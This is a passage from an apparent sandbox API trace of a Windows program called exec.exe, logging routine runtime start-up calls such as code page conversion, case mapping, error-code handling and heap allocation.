!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鲧ĂĀ", cchSrc=256, lpCharType=0x14f8dc | out: lpCharType=0x14f8dc) returned 1 [0102.363] GetLastError () returned 0x5 [0102.363] SetLastError (dwErrCode=0x5) [0102.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14fcdc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14fcdc, cbMultiByte=256, lpWideCharStr=0x14f618, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0102.363] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0102.363] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x14f408, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0102.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x14fbdc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x98\xe5\x02\xc9\x14\xfe\x14", lpUsedDefaultChar=0x0) returned 256 [0102.363] GetLastError () returned 0x5 [0102.363] SetLastError (dwErrCode=0x5) [0102.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14fcdc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0102.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14fcdc, cbMultiByte=256, lpWideCharStr=0x14f638, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0102.363] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0102.363] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x14f428, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0102.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x14fadc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x98\xe5\x02\xc9\x14\xfe\x14", lpUsedDefaultChar=0x0) returned 256 [0102.364] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x102f728, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\exec.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\exec.exe")) returned 0x34 [0102.364] GetLastError () returned 0x0 [0102.364] SetLastError (dwErrCode=0x0) [0102.364] GetLastError () returned 0x0 [0102.364] SetLastError (dwErrCode=0x0) [0102.364] GetLastError () returned 0x0 [0102.364] SetLastError (dwErrCode=0x0) [0102.364] GetLastError () returned 0x0 [0102.364] SetLastError (dwErrCode=0x0) [0102.364] GetLastError () returned 0x0 [0102.364] SetLastError (dwErrCode=0x0) [0102.364] GetLastError () returned 0x0 [0102.364] SetLastError (dwErrCode=0x0) [0102.364] GetLastError () returned 0x0 [0102.364] SetLastError (dwErrCode=0x0) [0102.364] GetLastError () returned 0x0 [0102.364] SetLastError (dwErrCode=0x0) [0102.364] GetLastError () returned 0x0 [0102.364] SetLastError (dwErrCode=0x0) [0102.364] GetLastError () returned 0x0 [0102.364] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.365] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.365] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.365] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.365] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.365] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.365] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.365] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.365] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.365] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.365] SetLastError (dwErrCode=0x0) [0102.365] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.366] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.366] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.366] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.366] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.366] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.366] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.366] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.366] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.366] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.366] GetLastError () returned 0x0 [0102.366] SetLastError (dwErrCode=0x0) [0102.367] GetLastError () returned 0x0 [0102.367] SetLastError (dwErrCode=0x0) [0102.367] GetLastError () returned 0x0 [0102.367] SetLastError (dwErrCode=0x0) [0102.367] GetLastError () returned 0x0 [0102.367] SetLastError (dwErrCode=0x0) [0102.367] GetLastError () returned 0x0 [0102.367] SetLastError (dwErrCode=0x0) [0102.367] GetLastError () returned 0x0 [0102.367] SetLastError (dwErrCode=0x0) [0102.367] GetLastError () returned 0x0 [0102.367] SetLastError (dwErrCode=0x0) [0102.367] GetLastError () returned 0x0 [0102.367] SetLastError (dwErrCode=0x0) [0102.367] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.368] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.368] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.368] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.368] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.368] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.368] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.368] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.368] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.368] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.368] GetLastError () returned 0x0 [0102.368] SetLastError (dwErrCode=0x0) [0102.369] GetLastError () returned 0x0 [0102.369] SetLastError (dwErrCode=0x0) [0102.369] GetLastError () returned 0x0 [0102.369] SetLastError (dwErrCode=0x0) [0102.369] GetLastError () returned 0x0 [0102.369] SetLastError (dwErrCode=0x0) [0102.369] GetLastError () returned 0x0 [0102.369] SetLastError (dwErrCode=0x0) [0102.369] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x0, Size=0x3d) returned 0xb319b0 [0102.369] GetLastError () returned 0x0 [0102.369] SetLastError (dwErrCode=0x0) [0102.369] GetLastError () returned 0x0 [0102.369] SetLastError (dwErrCode=0x0) [0102.369] GetLastError () returned 0x0 [0102.369] SetLastError (dwErrCode=0x0) [0102.369] GetLastError () returned 0x0 [0102.369] SetLastError (dwErrCode=0x0) [0102.369] GetLastError () returned 0x0 [0102.369] SetLastError (dwErrCode=0x0) [0102.369] GetLastError () returned 0x0 [0102.369] SetLastError (dwErrCode=0x0) [0102.369] GetLastError () returned 0x0 [0102.370] SetLastError (dwErrCode=0x0) [0102.370] GetLastError () returned 0x0 [0102.370] SetLastError (dwErrCode=0x0) [0102.370] GetLastError () returned 0x0 [0102.370] SetLastError (dwErrCode=0x0) [0102.370] GetLastError () returned 0x0 [0102.370] SetLastError (dwErrCode=0x0) [0102.370] GetLastError () returned 0x0 [0102.370] SetLastError (dwErrCode=0x0) [0102.370] GetLastError () returned 0x0 [0102.370] SetLastError (dwErrCode=0x0) [0102.370] GetLastError () returned 0x0 [0102.370] SetLastError (dwErrCode=0x0) [0102.370] GetLastError () returned 0x0 [0102.370] SetLastError (dwErrCode=0x0) [0102.370] GetLastError () returned 0x0 [0102.370] SetLastError (dwErrCode=0x0) [0102.370] GetLastError () returned 0x0 [0102.370] SetLastError (dwErrCode=0x0) [0102.370] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.371] SetLastError (dwErrCode=0x0) [0102.371] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.372] SetLastError (dwErrCode=0x0) [0102.372] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.373] SetLastError (dwErrCode=0x0) [0102.373] GetLastError () returned 0x0 [0102.374] SetLastError (dwErrCode=0x0) [0102.374] GetLastError () returned 0x0 [0102.374] SetLastError (dwErrCode=0x0) [0102.374] GetLastError () returned 0x0 [0102.374] SetLastError (dwErrCode=0x0) [0102.374] GetLastError () returned 0x0 [0102.374] SetLastError (dwErrCode=0x0) [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x9c) returned 0xb319f8 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x1f) returned 0xb31aa0 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x36) returned 0xb31ac8 [0102.374] RtlAllocateHeap (HeapHandle=0xb30000, Flags=0x8, Size=0x37) 